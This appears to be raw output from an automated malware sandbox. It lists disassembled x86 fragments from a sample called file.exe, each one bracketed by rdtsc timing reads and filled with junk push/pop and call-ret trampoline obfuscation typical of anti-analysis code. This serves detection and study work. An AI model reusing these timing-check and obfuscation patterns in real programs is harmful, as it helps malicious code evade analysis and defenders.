Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28BA5E second address: 28BA62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28BA62 second address: 28BAE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F625CDF2468h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 mov esi, ebx 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push eax 0x00000029 call 00007F625CDF2468h 0x0000002e pop eax 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 add dword ptr [esp+04h], 00000015h 0x0000003b inc eax 0x0000003c push eax 0x0000003d ret 0x0000003e pop eax 0x0000003f ret 0x00000040 jmp 00007F625CDF2473h 0x00000045 push FDF28125h 0x0000004a push eax 0x0000004b push edx 0x0000004c push edi 0x0000004d jmp 00007F625CDF2477h 0x00000052 pop edi 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28BAE3 second address: 28BB4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F625CED05BAh 0x00000008 jmp 00007F625CED05BFh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 add dword ptr [esp], 020D7F5Bh 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F625CED05B8h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 push 00000003h 0x00000033 mov di, 6970h 0x00000037 push 00000000h 0x00000039 mov cl, ECh 0x0000003b sub esi, 0121C6C3h 0x00000041 push 00000003h 0x00000043 clc 0x00000044 push F665D6DCh 0x00000049 pushad 0x0000004a jmp 00007F625CED05BBh 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28BB4E second address: 28BB92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF246Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xor dword ptr [esp], 3665D6DCh 0x00000011 jmp 00007F625CDF2477h 0x00000016 lea ebx, dword ptr [ebp+12450874h] 0x0000001c mov dh, 9Fh 0x0000001e xchg eax, ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 js 00007F625CDF2468h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28BC5E second address: 28BC97 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F625CED05B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d jo 00007F625CED05BCh 0x00000013 jnp 00007F625CED05B6h 0x00000019 pop ebx 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e jp 00007F625CED05C5h 0x00000024 mov eax, dword ptr [eax] 0x00000026 pushad 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28BC97 second address: 28BC9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28BC9D second address: 28BCB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F625CED05C1h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28BCB5 second address: 28BCDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF2474h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F625CDF246Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28BCDC second address: 28BCE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28BCE0 second address: 28BD87 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F625CDF246Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b js 00007F625CDF246Ch 0x00000011 sub dword ptr [ebp+122D1C74h], edx 0x00000017 push 00000003h 0x00000019 jnp 00007F625CDF246Ch 0x0000001f mov ecx, dword ptr [ebp+122D2C15h] 0x00000025 mov dword ptr [ebp+122D1C91h], ebx 0x0000002b push 00000000h 0x0000002d push 00000003h 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007F625CDF2468h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 0000001Ch 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 call 00007F625CDF2469h 0x0000004e jp 00007F625CDF246Eh 0x00000054 push eax 0x00000055 ja 00007F625CDF246Ah 0x0000005b mov eax, dword ptr [esp+04h] 0x0000005f pushad 0x00000060 push edx 0x00000061 jmp 00007F625CDF246Ah 0x00000066 pop edx 0x00000067 jmp 00007F625CDF2470h 0x0000006c popad 0x0000006d mov eax, dword ptr [eax] 0x0000006f push eax 0x00000070 push edx 0x00000071 pushad 0x00000072 push edx 0x00000073 pop edx 0x00000074 pushad 0x00000075 popad 0x00000076 popad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28BD87 second address: 28BDAB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F625CED05BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F625CED05BEh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28BDAB second address: 28BDB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28BE7C second address: 28BEA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D2EBFh], ecx 0x0000000f push 00000000h 0x00000011 or esi, dword ptr [ebp+122D2EC4h] 0x00000017 call 00007F625CED05B9h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28BEA1 second address: 28BEA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28BEA5 second address: 28BEEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007F625CED05BFh 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 pushad 0x00000018 jmp 00007F625CED05C0h 0x0000001d push ebx 0x0000001e pushad 0x0000001f popad 0x00000020 pop ebx 0x00000021 popad 0x00000022 mov eax, dword ptr [eax] 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F625CED05BAh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28BEEA second address: 28BF10 instructions: 0x00000000 rdtsc 0x00000002 js 00007F625CDF2474h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007F625CDF2468h 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 29E63E second address: 29E64B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AA4E5 second address: 2AA4E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AA4E9 second address: 2AA4FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AA4FD second address: 2AA51E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F625CDF246Fh 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c jmp 00007F625CDF246Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AA8B6 second address: 2AA8BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AAC7C second address: 2AAC8D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jp 00007F625CDF2466h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AB0F7 second address: 2AB12C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05BEh 0x00000007 jbe 00007F625CED05CEh 0x0000000d jmp 00007F625CED05C8h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AB12C second address: 2AB133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AB25B second address: 2AB25F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A3ED6 second address: 2A3EEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF2475h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2A3EEF second address: 2A3EFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F625CED05B6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27A6F1 second address: 27A6F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27A6F5 second address: 27A710 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05BEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27A710 second address: 27A728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F625CDF2474h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27A728 second address: 27A732 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F625CED05B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ABC10 second address: 2ABC15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ABE73 second address: 2ABE7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ABE7D second address: 2ABE87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F625CDF2466h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ABE87 second address: 2ABE94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ABE94 second address: 2ABE9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AC327 second address: 2AC32D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AC32D second address: 2AC333 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2AC333 second address: 2AC33F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B031E second address: 2B0324 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B05D2 second address: 2B05F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov eax, dword ptr [eax] 0x00000007 js 00007F625CED05BAh 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jc 00007F625CED05B6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B05F1 second address: 2B05F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B05F5 second address: 2B05FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B81C1 second address: 2B81C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 282D08 second address: 282D0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 282D0C second address: 282D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 282D12 second address: 282D3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05BCh 0x00000007 jc 00007F625CED05D3h 0x0000000d jmp 00007F625CED05C7h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 282D3F second address: 282D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F625CDF246Fh 0x00000010 pop eax 0x00000011 jns 00007F625CDF246Ch 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B7762 second address: 2B7769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B7769 second address: 2B7780 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jc 00007F625CDF2466h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B7780 second address: 2B7784 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B791D second address: 2B794D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F625CDF2485h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B7A89 second address: 2B7AA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F625CED05BDh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B7AA5 second address: 2B7AAB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B7AAB second address: 2B7AC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05BCh 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B7EA8 second address: 2B7EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B7EAC second address: 2B7EBD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F625CED05B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B7EBD second address: 2B7EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B9525 second address: 2B952D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B97C4 second address: 2B97C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B9C92 second address: 2B9CC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebx 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F625CED05B8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 nop 0x00000028 pushad 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B9CC1 second address: 2B9CC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B9CC7 second address: 2B9CDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F625CED05BAh 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B9CDD second address: 2B9CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2B9E33 second address: 2B9E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2BA1CA second address: 2BA1E5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edi, dword ptr [ebp+122D2D7Ch] 0x00000011 xchg eax, ebx 0x00000012 jnl 00007F625CDF246Eh 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2BC19C second address: 2BC1A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2BC1A0 second address: 2BC1AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F625CDF2466h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2BC1AE second address: 2BC1BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2BC1BB second address: 2BC1BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2BC1BF second address: 2BC1C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2BC1C3 second address: 2BC252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F625CDF2476h 0x0000000b popad 0x0000000c nop 0x0000000d jmp 00007F625CDF246Eh 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F625CDF2468h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D3145h], edi 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edi 0x00000039 call 00007F625CDF2468h 0x0000003e pop edi 0x0000003f mov dword ptr [esp+04h], edi 0x00000043 add dword ptr [esp+04h], 00000019h 0x0000004b inc edi 0x0000004c push edi 0x0000004d ret 0x0000004e pop edi 0x0000004f ret 0x00000050 mov dword ptr [ebp+1244D453h], esi 0x00000056 jne 00007F625CDF246Ch 0x0000005c xchg eax, ebx 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2BC252 second address: 2BC256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2BC256 second address: 2BC267 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF246Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2BDCE3 second address: 2BDCEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2BCB87 second address: 2BCB8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2BCB8B second address: 2BCB91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27F7DF second address: 27F7E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2BCB91 second address: 2BCBB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F625CED05C4h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2BE37F second address: 2BE398 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF2471h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2BE398 second address: 2BE39C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2BF849 second address: 2BF84F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
